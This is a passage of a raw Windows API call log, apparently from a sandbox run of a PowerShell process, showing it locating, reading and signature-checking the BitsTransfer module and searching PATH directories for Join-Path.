ftLastAccessTime.dwLowDateTime=0x14a2760e, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x37b3dedc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x3b6, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer.psd1", cAlternateFileName="")) returned 1 [0149.777] FindNextFileW (in: hFindFile=0x68e9a0, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x1e4bcac7, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22bdbd7c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0149.777] FindNextFileW (in: hFindFile=0x68e9a0, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3c83bd9, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb3c83bd9, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb3c83bd9, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x19800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll", cAlternateFileName="")) returned 1 [0149.777] FindNextFileW (in: hFindFile=0x68e9a0, lpFindFileData=0x5a0e338 | out: lpFindFileData=0x5a0e338*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3c83bd9, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb3c83bd9, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb3c83bd9, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x19800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll", cAlternateFileName="")) returned 0 [0149.777] FindClose (in: hFindFile=0x68e9a0 | out: hFindFile=0x68e9a0) returned 1 [0149.777] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2f0) returned 1 [0149.777] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e550) returned 1 [0149.777] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\bitstransfer\\bitstransfer.psd1")) returned 0x20 [0149.778] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x52 [0149.778] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", nBufferLength=0x52, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", lpFilePart=0x0) returned 0x51 [0149.778] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x52 [0149.778] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", nBufferLength=0x52, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", lpFilePart=0x0) returned 0x51 [0149.778] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e2f8) returned 1 [0149.778] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\bitstransfer\\bitstransfer.psd1"), fInfoLevelId=0x0, lpFileInformation=0x296ba48 | out: lpFileInformation=0x296ba48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14a2760e, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x14a2760e, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x37b3dedc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x3b6)) returned 1 [0149.778] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e2f4) returned 1 [0149.778] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x52 [0149.779] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", nBufferLength=0x52, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", lpFilePart=0x0) returned 0x51 [0149.779] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e460) returned 1 [0149.779] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\bitstransfer\\bitstransfer.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x28c [0149.779] GetFileType (hFile=0x28c) returned 0x1 [0149.779] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e45c) returned 1 [0149.779] GetFileType (hFile=0x28c) returned 0x1 [0149.779] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e49c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e49c*=0) returned 0x0 [0149.779] ReadFile (in: hFile=0x28c, lpBuffer=0x296c838, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e4c8, lpOverlapped=0x0 | out: lpBuffer=0x296c838*, lpNumberOfBytesRead=0x5a0e4c8*=0x3b6, lpOverlapped=0x0) returned 1 [0149.782] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0e49c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0e49c*=0) returned 0x3b6 [0149.782] ReadFile (in: hFile=0x28c, lpBuffer=0x296c838, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0e4c8, lpOverlapped=0x0 | out: lpBuffer=0x296c838*, lpNumberOfBytesRead=0x5a0e4c8*=0x0, lpOverlapped=0x0) returned 1 [0149.783] CoCreateGuid (in: pguid=0x5a0e508 | out: pguid=0x5a0e508*(Data1=0x4d5548b, Data2=0x8b07, Data3=0x42fc, Data4=([0]=0xa4, [1]=0x5f, [2]=0xb7, [3]=0x1a, [4]=0xb5, [5]=0x24, [6]=0x52, [7]=0xd))) returned 0x0 [0149.784] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x28c [0149.784] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x290 [0149.784] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x19c [0149.784] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x408 [0149.785] SetEvent (hEvent=0x408) returned 1 [0149.785] SetEvent (hEvent=0x28c) returned 1 [0149.785] SetEvent (hEvent=0x290) returned 1 [0149.785] SetEvent (hEvent=0x19c) returned 1 [0149.785] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x36c [0149.786] SetThreadUILanguage (LangId=0x0) returned 0x409 [0149.787] EtwEventActivityIdControl () returned 0x0 [0149.788] EtwEventActivityIdControl () returned 0x0 [0149.788] EtwEventActivityIdControl () returned 0x0 [0149.795] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\bitstransfer\\bitstransfer.psd1")) returned 0x20 [0149.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x52 [0149.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", nBufferLength=0x52, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", lpFilePart=0x0) returned 0x51 [0149.796] NtQuerySystemInformation (in: SystemInformationClass=0xa4, SystemInformation=0x5a0de40, Length=0x20, ResultLength=0x5a0deb0 | out: SystemInformation=0x5a0de40, ResultLength=0x5a0deb0*=0x0) returned 0xc0000003 [0149.796] GetSystemInfo (in: lpSystemInfo=0x5a0debc | out: lpSystemInfo=0x5a0debc*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0149.797] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0de4c | out: phkResult=0x5a0de4c*=0x3d0) returned 0x0 [0149.798] RegQueryValueExW (in: hKey=0x3d0, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x5a0de68, lpData=0x0, lpcbData=0x5a0de64*=0x0 | out: lpType=0x5a0de68*=0x0, lpData=0x0, lpcbData=0x5a0de64*=0x0) returned 0x2 [0149.798] RegCloseKey (hKey=0x3d0) returned 0x0 [0149.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x52 [0149.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", nBufferLength=0x52, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", lpFilePart=0x0) returned 0x51 [0149.798] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0ddc4) returned 1 [0149.799] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\bitstransfer\\bitstransfer.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d0 [0149.799] GetFileType (hFile=0x3d0) returned 0x1 [0149.799] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0ddc0) returned 1 [0149.799] GetFileType (hFile=0x3d0) returned 0x1 [0149.799] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0de00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0de00*=0) returned 0x0 [0149.799] ReadFile (in: hFile=0x3d0, lpBuffer=0x297a23c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0de2c, lpOverlapped=0x0 | out: lpBuffer=0x297a23c*, lpNumberOfBytesRead=0x5a0de2c*=0x3b6, lpOverlapped=0x0) returned 1 [0149.800] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0de00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0de00*=0) returned 0x3b6 [0149.800] ReadFile (in: hFile=0x3d0, lpBuffer=0x297a23c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0de2c, lpOverlapped=0x0 | out: lpBuffer=0x297a23c*, lpNumberOfBytesRead=0x5a0de2c*=0x0, lpOverlapped=0x0) returned 1 [0149.800] NtQuerySystemInformation (in: SystemInformationClass=0xa4, SystemInformation=0x5a0dd94, Length=0x20, ResultLength=0x5a0de04 | out: SystemInformation=0x5a0dd94, ResultLength=0x5a0de04*=0x0) returned 0xc0000003 [0149.800] GetSystemInfo (in: lpSystemInfo=0x5a0de10 | out: lpSystemInfo=0x5a0de10*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0149.801] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0dda0 | out: phkResult=0x5a0dda0*=0x40c) returned 0x0 [0149.801] RegQueryValueExW (in: hKey=0x40c, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x5a0ddbc, lpData=0x0, lpcbData=0x5a0ddb8*=0x0 | out: lpType=0x5a0ddbc*=0x0, lpData=0x0, lpcbData=0x5a0ddb8*=0x0) returned 0x2 [0149.801] RegCloseKey (hKey=0x40c) returned 0x0 [0149.801] CloseHandle (hObject=0x3d0) returned 1 [0149.802] CoCreateGuid (in: pguid=0x5a0de90 | out: pguid=0x5a0de90*(Data1=0x4953727d, Data2=0x4bd2, Data3=0x4c36, Data4=([0]=0x93, [1]=0x1b, [2]=0x1f, [3]=0x33, [4]=0x93, [5]=0xa2, [6]=0x61, [7]=0x41))) returned 0x0 [0149.804] QueryPerformanceCounter (in: lpPerformanceCount=0x5a0dbf0 | out: lpPerformanceCount=0x5a0dbf0*=2943461473504) returned 1 [0149.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x52 [0149.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", nBufferLength=0x52, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", lpFilePart=0x0) returned 0x51 [0149.804] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d8dc) returned 1 [0149.805] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\bitstransfer\\bitstransfer.psd1"), fInfoLevelId=0x0, lpFileInformation=0x5a0dba0 | out: lpFileInformation=0x5a0dba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14a2760e, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x14a2760e, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x37b3dedc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x3b6)) returned 1 [0149.805] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d8d8) returned 1 [0149.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x52 [0149.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", nBufferLength=0x52, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", lpFilePart=0x0) returned 0x51 [0149.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x52 [0149.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", nBufferLength=0x52, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", lpFilePart=0x0) returned 0x51 [0149.805] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d870) returned 1 [0149.805] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\bitstransfer\\bitstransfer.psd1"), fInfoLevelId=0x0, lpFileInformation=0x5a0db34 | out: lpFileInformation=0x5a0db34*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14a2760e, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x14a2760e, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x37b3dedc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x3b6)) returned 1 [0149.805] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d86c) returned 1 [0149.805] CoTaskMemAlloc (cb=0x10) returned 0x655900 [0149.806] CoTaskMemAlloc (cb=0x10) returned 0x655b28 [0149.806] CoTaskMemAlloc (cb=0xa4) returned 0x5bca9a0 [0149.806] CoTaskMemAlloc (cb=0x30) returned 0x5bc3e58 [0149.806] WinVerifyTrust () returned 0x800b0100 [0149.854] CoTaskMemFree (pv=0x655900) [0149.855] CoTaskMemFree (pv=0x5bc3e58) [0149.855] CryptCATHandleFromStore () returned 0x65b268 [0149.855] WTHelperGetProvSignerFromChain () returned 0x0 [0149.855] CoTaskMemAlloc (cb=0x10) returned 0x655900 [0149.855] CoTaskMemAlloc (cb=0x30) returned 0x5bc3e58 [0149.855] WinVerifyTrust () returned 0x0 [0149.855] CoTaskMemFree (pv=0x5bc3e58) [0149.855] CoTaskMemFree (pv=0x655900) [0149.855] CoTaskMemFree (pv=0x5bca9a0) [0149.855] CoTaskMemFree (pv=0x655b28) [0149.882] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x5a0d68c, nSize=0xc9 | out: lpBuffer="") returned 0x0 [0149.883] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x5a0d5a8, nSize=0xc9 | out: lpBuffer="") returned 0xc8 [0149.883] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x5a0d594, nSize=0xc9 | out: lpBuffer="") returned 0x3a [0149.883] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x5bc3b18 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop") returned 0x1a [0149.883] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x5a0d59c, nSize=0xc9 | out: lpBuffer="") returned 0x3a [0149.884] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x39 [0149.884] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x39, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0149.884] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d4a8) returned 1 [0149.884] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x5a0d76c | out: lpFileInformation=0x5a0d76c*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0x46c57d00, ftCreationTime.dwHighDateTime=0x1d8c103, ftLastAccessTime.dwLowDateTime=0x46c57d00, ftLastAccessTime.dwHighDateTime=0x1d8c103, ftLastWriteTime.dwLowDateTime=0x46c57d00, ftLastWriteTime.dwHighDateTime=0x1d8c103, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0149.884] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d4a4) returned 1 [0149.884] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d764) returned 1 [0149.884] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x39 [0149.884] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x39, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0149.885] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\Join-Path.*" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\join-path.*"), lpFindFileData=0x5a0d514 | out: lpFindFileData=0x5a0d514*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0149.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d4bc) returned 1 [0149.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d71c) returned 1 [0149.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0149.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x14, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0149.885] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d4a8) returned 1 [0149.885] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x5a0d76c | out: lpFileInformation=0x5a0d76c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x26f5fe20, ftLastAccessTime.dwHighDateTime=0x1d8a6e9, ftLastWriteTime.dwLowDateTime=0x26f5fe20, ftLastWriteTime.dwHighDateTime=0x1d8a6e9, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0149.885] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d4a4) returned 1 [0149.886] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d764) returned 1 [0149.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0149.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x14, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0149.886] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Join-Path.*" (normalized: "c:\\windows\\syswow64\\join-path.*"), lpFindFileData=0x5a0d514 | out: lpFindFileData=0x5a0d514*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0149.887] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d4bc) returned 1 [0149.887] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d71c) returned 1 [0149.887] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0149.888] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0xb, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0149.888] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d4a8) returned 1 [0149.888] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x5a0d76c | out: lpFileInformation=0x5a0d76c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xd3858bf0, ftLastAccessTime.dwHighDateTime=0x1d8c12f, ftLastWriteTime.dwLowDateTime=0xd3858bf0, ftLastWriteTime.dwHighDateTime=0x1d8c12f, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0149.888] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d4a4) returned 1 [0149.888] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d764) returned 1 [0149.888] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0149.888] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0xb, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0149.888] FindFirstFileW (in: lpFileName="C:\\Windows\\Join-Path.*" (normalized: "c:\\windows\\join-path.*"), lpFindFileData=0x5a0d514 | out: lpFindFileData=0x5a0d514*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0149.889] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d4bc) returned 1 [0149.889] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d71c) returned 1 [0149.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", 